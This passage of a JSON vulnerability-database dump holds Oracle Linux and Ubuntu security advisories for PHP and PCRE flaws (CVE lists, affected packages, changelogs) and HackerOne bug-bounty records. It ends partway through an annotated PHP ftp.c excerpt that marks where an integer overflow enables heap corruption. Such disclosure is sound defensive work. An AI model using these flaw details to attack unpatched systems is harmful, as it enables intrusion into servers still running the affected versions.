"packageFilename": "php-zts-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-zts", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-soap-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "src", "packageFilename": "php-5.3.3-46.el6_6.src.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "src", "packageFilename": "php-5.3.3-46.el6_6.src.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-xml-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-fpm-5.3.3-46.el6_6.i686.rpm", "packageName": "php-fpm", "operator": "lt"}], "description": "[5.3.3-46]\n- fix gzfile accept paths with NUL character #1213407\n- fix patch for CVE-2015-4024\n[5.3.3-45]\n- fix more functions accept paths with NUL character #1213407\n[5.3.3-44]\n- soap: missing fix for #1222538 and #1204868\n[5.3.3-43]\n- core: fix multipart/form-data request can use excessive\n amount of CPU usage CVE-2015-4024\n- fix various functions accept paths with NUL character\n CVE-2015-4026, #1213407\n- ftp: fix integer overflow leading to heap overflow when\n reading FTP file listing CVE-2015-4022\n- phar: fix buffer over-read in metadata parsing CVE-2015-2783\n- phar: invalid pointer free() in phar_tar_process_metadata()\n CVE-2015-3307\n- phar: fix buffer overflow in phar_set_inode() CVE-2015-3329\n- phar: fix memory corruption in phar_parse_tarfile caused by\n empty entry file name CVE-2015-4021\n- soap: more fix type confusion through unserialize #1222538\n[5.3.3-42]\n- soap: more fix type confusion through unserialize #1204868\n[5.3.3-41]\n- core: fix double in zend_ts_hash_graceful_destroy CVE-2014-9425\n- core: fix use-after-free in unserialize CVE-2015-2787\n- exif: fix free on unitialized pointer CVE-2015-0232\n- gd: fix buffer read overflow in gd_gif.c CVE-2014-9709\n- date: fix use after free vulnerability in unserialize CVE-2015-0273\n- enchant: fix heap buffer overflow in enchant_broker_request_dict\n CVE-2014-9705\n- phar: use after free in phar_object.c CVE-2015-2301\n- soap: fix type confusion through unserialize", "edition": 3, "reporter": "Oracle", "published": "2015-07-09T00:00:00", "title": "php security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-2301", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-0273", "CVE-2015-4148", "CVE-2015-3307", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598"], "modified": "2015-07-09T00:00:00", "id": "ELSA-2015-1218", "href": "http://linux.oracle.com/errata/ELSA-2015-1218.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:47:20", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-ldap-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-mysqlnd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-mysql-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-gd-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-cli-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-odbc-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-dba-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-snmp-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-mbstring-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-xml-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-recode-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-pdo-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-intl-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-intl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-process-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-devel-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-enchant-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-fpm-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-fpm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-pgsql-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-soap-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-pspell-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "src", "packageFilename": "php-5.4.16-36.el7_1.src.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-bcmath-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-embedded-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-embedded", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "arch": "x86_64", "packageFilename": "php-common-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-common", "operator": "lt"}], "description": "[5.4.16-36]\n- fix more functions accept paths with NUL character #1213407\n[5.4.16-35]\n- core: fix multipart/form-data request can use excessive\n amount of CPU usage CVE-2015-4024\n- fix various functions accept paths with NUL character\n CVE-2015-4025, CVE-2015-4026, #1213407\n- fileinfo: fix denial of service when processing a crafted\n file #1213442\n- ftp: fix integer overflow leading to heap overflow when\n reading FTP file listing CVE-2015-4022\n- phar: fix buffer over-read in metadata parsing CVE-2015-2783\n- phar: invalid pointer free() in phar_tar_process_metadata()\n CVE-2015-3307\n- phar: fix buffer overflow in phar_set_inode() CVE-2015-3329\n- phar: fix memory corruption in phar_parse_tarfile caused by\n empty entry file name CVE-2015-4021\n- soap: fix type confusion through unserialize #1222538\n- apache2handler: fix pipelined request executed in deinitialized\n interpreter under httpd 2.4 CVE-2015-3330\n[5.4.16-34]\n- fix memory corruption in fileinfo module on big endian\n machines #1082624\n- fix segfault in pdo_odbc on x86_64 #1159892\n- fix segfault in gmp allocator #1154760\n[5.4.16-33]\n- core: use after free vulnerability in unserialize()\n CVE-2014-8142 and CVE-2015-0231\n- core: fix use-after-free in unserialize CVE-2015-2787\n- core: fix NUL byte injection in file name argument of\n move_uploaded_file() CVE-2015-2348\n- date: use after free vulnerability in unserialize CVE-2015-0273\n- enchant: fix heap buffer overflow in enchant_broker_request_dict\n CVE-2014-9705\n- exif: free called on unitialized pointer CVE-2015-0232\n- fileinfo: fix out of bounds read in mconvert CVE-2014-9652\n- gd: fix buffer read overflow in gd_gif_in.c CVE-2014-9709\n- phar: use after free in phar_object.c CVE-2015-2301\n- soap: fix type confusion through unserialize\n[5.4.16-31]\n- fileinfo: fix out-of-bounds read in elf note headers. CVE-2014-3710\n[5.4.16-29]\n- xmlrpc: fix out-of-bounds read flaw in mkgmtime() CVE-2014-3668\n- core: fix integer overflow in unserialize() CVE-2014-3669\n- exif: fix heap corruption issue in exif_thumbnail() CVE-2014-3670\n[5.4.16-27]\n- gd: fix NULL pointer dereference in gdImageCreateFromXpm().\n CVE-2014-2497\n- gd: fix NUL byte injection in file names. CVE-2014-5120\n- fileinfo: fix extensive backtracking in regular expression\n (incomplete fix for CVE-2013-7345). CVE-2014-3538\n- fileinfo: fix mconvert incorrect handling of truncated\n pascal string size. CVE-2014-3478\n- fileinfo: fix cdf_read_property_info\n (incomplete fix for CVE-2012-1571). CVE-2014-3587\n- spl: fix use-after-free in ArrayIterator due to object\n change during sorting. CVE-2014-4698\n- spl: fix use-after-free in SPL Iterators. CVE-2014-4670\n- network: fix segfault in dns_get_record\n (incomplete fix for CVE-2014-4049). CVE-2014-3597\n[5.4.16-25]\n- fix segfault after startup on aarch64 (#1107567)\n- compile php with -O3 on ppc64le (#1123499)", "edition": 3, "reporter": "Oracle", "published": "2015-06-23T00:00:00", "title": "php security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2013-7345", "CVE-2015-2783", "CVE-2015-3329", "CVE-2014-3478", "CVE-2015-3330", "CVE-2015-2301", "CVE-2014-3587", "CVE-2012-1571", "CVE-2014-9709", "CVE-2014-4670", "CVE-2014-3668", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4148", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4025", "CVE-2014-3669", "CVE-2015-4024", "CVE-2015-4021", "CVE-2014-3538", "CVE-2014-5120", "CVE-2014-3597", "CVE-2014-3710", "CVE-2015-4602", "CVE-2015-4026", "CVE-2014-4698", "CVE-2015-4147", "CVE-2015-3411", "CVE-2014-4049", "CVE-2015-4604", "CVE-2014-3670", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2014-2497", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-0231"], "modified": "2015-06-23T00:00:00", "id": "ELSA-2015-1135", "href": "http://linux.oracle.com/errata/ELSA-2015-1135.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:10:12", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2015-5073", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-2325", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-3210", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-2326", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-8964"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "1:8.31-2ubuntu2.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libpcre3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "8.12-4ubuntu0.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libpcre3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "15.04", "packageVersion": "2:8.35-3.3ubuntu1.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libpcre3", "operator": "lt"}], "description": "Michele Spagnuolo discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS. (CVE-2014-8964)\n\nKai Lu discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-2325, CVE-2015-2326)\n\nWen Guanxing discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 15.04. (CVE-2015-3210)\n\nIt was discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 12.04 LTS and 14.04 LTS. (CVE-2015-5073)", "edition": 3, "reporter": "Ubuntu", "published": "2015-07-29T00:00:00", "title": "PCRE vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-3210", "CVE-2015-2325", "CVE-2014-8964", "CVE-2015-5073", "CVE-2015-2326"], "modified": "2015-07-29T00:00:00", "id": "USN-2694-1", "href": "https://usn.ubuntu.com/2694-1/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:09:54", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4599", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4644", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4643", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4602", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4601", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4021", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-3412", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-3411", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4605", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4026", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4598", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4147", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4600", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4603", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4148", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4025", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4024", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4022", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-4604"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "14.10", "packageVersion": "5.5.12+dfsg-2ubuntu4.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.10", "packageVersion": "5.5.12+dfsg-2ubuntu4.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "15.04", "packageVersion": "5.6.4+dfsg-4ubuntu6.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-fpm", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "15.04", "packageVersion": "5.6.4+dfsg-4ubuntu6.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "5.5.9+dfsg-1ubuntu4.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "5.3.10-1ubuntu3.19", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-fpm", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "15.04", "packageVersion": "5.6.4+dfsg-4ubuntu6.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.10", "packageVersion": "5.5.12+dfsg-2ubuntu4.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "5.3.10-1ubuntu3.19", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "5.5.9+dfsg-1ubuntu4.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "5.5.9+dfsg-1ubuntu4.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cli", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "5.3.10-1ubuntu3.19", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-cgi", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "5.5.9+dfsg-1ubuntu4.11", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-fpm", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "15.04", "packageVersion": "5.6.4+dfsg-4ubuntu6.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "5.3.10-1ubuntu3.19", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libapache2-mod-php5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.10", "packageVersion": "5.5.12+dfsg-2ubuntu4.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "php5-fpm", "operator": "lt"}], "description": "Neal Poole and Tomas Hoger discovered that PHP incorrectly handled NULL bytes in file paths. A remote attacker could possibly use this issue to bypass intended restrictions and create or obtain access to sensitive files. (CVE-2015-3411, CVE-2015-3412, CVE-2015-4025, CVE-2015-4026, CVE-2015-4598)\n\nEmmanuel Law discovered that the PHP phar extension incorrectly handled filenames starting with a NULL byte. A remote attacker could use this issue with a crafted tar archive to cause a denial of service. (CVE-2015-4021)\n\nMax Spelsberg discovered that PHP incorrectly handled the LIST command when connecting to remote FTP servers. A malicious FTP server could possibly use this issue to execute arbitrary code. (CVE-2015-4022, CVE-2015-4643)\n\nShusheng Liu discovered that PHP incorrectly handled certain malformed form data. A remote attacker could use this issue with crafted form data to cause CPU consumption, leading to a denial of service. (CVE-2015-4024)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated data types. A remote attacker could use this issue with crafted serialized data to possibly execute arbitrary code. (CVE-2015-4147)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated that the uri property is a string. A remote attacker could use this issue with crafted serialized data to possibly obtain sensitive information. (CVE-2015-4148)\n\nTaoguang Chen discovered that PHP incorrectly validated data types in multiple locations. A remote attacker could possibly use these issues to obtain sensitive information or cause a denial of service. (CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was discovered that the PHP Fileinfo component incorrectly handled certain files. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service. This issue only affected Ubuntu 15.04. (CVE-2015-4604, CVE-2015-4605)\n\nIt was discovered that PHP incorrectly handled table names in php_pgsql_meta_data. A local attacker could possibly use this issue to cause PHP to crash, resulting in a denial of service. (CVE-2015-4644)", "edition": 3, "reporter": "Ubuntu", "published": "2015-07-06T00:00:00", "title": "PHP vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-4601", "CVE-2015-4644", "CVE-2015-4148", "CVE-2015-4605", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-4643"], "modified": "2015-07-06T00:00:00", "id": "USN-2658-1", "href": "https://usn.ubuntu.com/2658-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:09:52", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8381", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8392", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-3191", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-2328", "https://people.canonical.com/~ubuntu-security/cve/CVE-2016-1283", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8387", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-5073", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-2325", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8395", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8393", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8385", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-3210", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8382", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8388", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8380", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8384", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-2326", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-2327", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8389", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8390", "https://people.canonical.com/~ubuntu-security/cve/CVE-2014-9769", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8386", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8394", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8391", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-8383"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "15.10", "packageVersion": "2:8.35-7.1ubuntu1.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libpcre3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "8.12-4ubuntu0.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libpcre3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "1:8.31-2ubuntu2.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libpcre3", "operator": "lt"}], "description": "It was discovered that PCRE incorrectly handled certain regular expressions. A remote attacker could use this issue to cause applications using PCRE to crash, resulting in a denial of service, or possibly execute arbitrary code.", "edition": 3, "reporter": "Ubuntu", "published": "2016-03-29T00:00:00", "title": "PCRE vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-8388", "CVE-2015-3210", "CVE-2015-2325", "CVE-2015-8391", "CVE-2015-8395", "CVE-2015-8382", "CVE-2015-8386", "CVE-2015-2327", "CVE-2015-8392", "CVE-2015-8389", "CVE-2015-8380", "CVE-2016-1283", "CVE-2015-8393", "CVE-2015-8394", "CVE-2016-3191", "CVE-2015-8384", "CVE-2015-8383", "CVE-2015-8381", "CVE-2015-5073", "CVE-2015-8385", "CVE-2015-2328", "CVE-2014-9769", "CVE-2015-8387", "CVE-2015-8390", "CVE-2015-2326"], "modified": "2016-03-29T00:00:00", "id": "USN-2943-1", "href": "https://usn.ubuntu.com/2943-1/", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:13", "references": [], "bounty": 500.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/029/0a20311cece1ff1938eac3f9b09a6af056bc9e90_small.png?1385119730", "medium": "https://profile-photos.hackerone-user-content.com/000/000/029/991fb39ba898696eb6ae62521c49b292b2a9cf95_medium.png?1385119730"}, "handle": "ibb-php", "url": "https://hackerone.com/ibb-php"}, "bountyState": "resolved", "description": "https://bugs.php.net/bug.php?id=69453", "edition": 7, "reporter": "libnex", "published": "2015-04-15T00:00:00", "title": "PHP (IBB): Memory Corruption in phar_parse_tarfile when entry filename starts with null", "type": "hackerone", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "h1reporter": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/002/468/d096d75715775b4942331c8d6581d03121ce7c76_small.png?1397270899"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "hackerone_triager": false, "url": "/libnex", "username": "libnex"}, "bulletinFamily": "bugbounty", "cvelist": ["CVE-2015-4021"], "modified": "2015-05-12T00:00:00", "id": "H1:104027", "href": "https://hackerone.com/reports/104027", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T00:39:15", "references": [], "bounty": 1500.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/029/0a20311cece1ff1938eac3f9b09a6af056bc9e90_small.png?1385119730", "medium": "https://profile-photos.hackerone-user-content.com/000/000/029/991fb39ba898696eb6ae62521c49b292b2a9cf95_medium.png?1385119730"}, "handle": "ibb-php", "url": "https://hackerone.com/ibb-php"}, "bountyState": "resolved", "description": "https://bugs.php.net/bug.php?id=69545\n\nDescription:\n------------\nThe ftp_genlist() function of the ftp extension is prone to an integer overflow, which may result in remote code execution.\n\n```\next/ftp/ftp.c:ftp_genlist(...)\n1826 size = 0;\n1827 lines = 0;\n1828 lastch = 0;\n1829 while ((rcvd = my_recv(ftp, data->fd, data->buf, FTP_BUFSIZE))) {\n1830 if (rcvd == -1) {\n1831 goto bail;\n1832 }\n1833\n1834 php_stream_write(tmpstream, data->buf, rcvd);\n1835\n1836 size += rcvd;\n1837 for (ptr = data->buf; rcvd; rcvd--, ptr++) {\n1838 if (*ptr == '\\n' && lastch == '\\r') {\n1839 lines++; // [0]\n1840 } else {\n1841 size++; // [1]\n1842 }\n1843 lastch = *ptr;\n1844 }\n1845 }\n```\n\nIn the above loop `size' or `lines' may overflow (at [0] respectively [1]).\nThis requires sending more than 2^32 bytes, which will be stored in a tempfile.\n\n```\n1851 ret = safe_emalloc((lines + 1), sizeof(char*), size); // [2]\n1852\n1853 entry = ret;\n1854 text = (char*) (ret + lines + 1);\n1855 *entry = text;\n1856 lastch = 0;\n1857 while ((ch = php_stream_getc(tmpstream)) != EOF) {\n1858 if (ch == '\\n' && lastch == '\\r') {\n1859 *(text - 1) = 0;\n1860 *++entry = text;\n1861 } else {\n1862 *text++ = ch; // 